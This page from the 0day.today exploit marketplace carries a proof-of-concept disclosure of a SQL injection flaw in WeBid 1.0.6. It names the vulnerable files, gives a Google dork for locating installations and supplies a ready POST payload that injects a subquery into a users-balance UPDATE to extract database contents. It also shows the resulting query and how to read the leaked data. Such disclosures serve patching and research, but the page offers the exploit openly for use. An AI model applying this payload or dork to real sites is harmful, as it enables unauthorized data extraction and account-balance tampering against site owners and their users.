0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

WeBid 1.0.6 SQL Injection Vulnerability

Author

Life Wasted

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability
# Google Dork: "Powered by WeBid"
# Exploit Author: Life Wasted
# Vendor Homepage: http://www.webidsupport.com/
# Version: Tested on 1.0.6, but could affect other version
# Tested On: Linux, Windows
 
Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file
 
Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are using in an UPDATE query:
$query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.
 
For example, the attacker could send the following post data to extract the name of the current database.
 
http://site.com/validate.php?toocheckout=asdf
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())
 
The resulting query would be:
UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID*
 
Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

WeBid 1.0.6 SQL Injection Vulnerability

Report Error

Report Error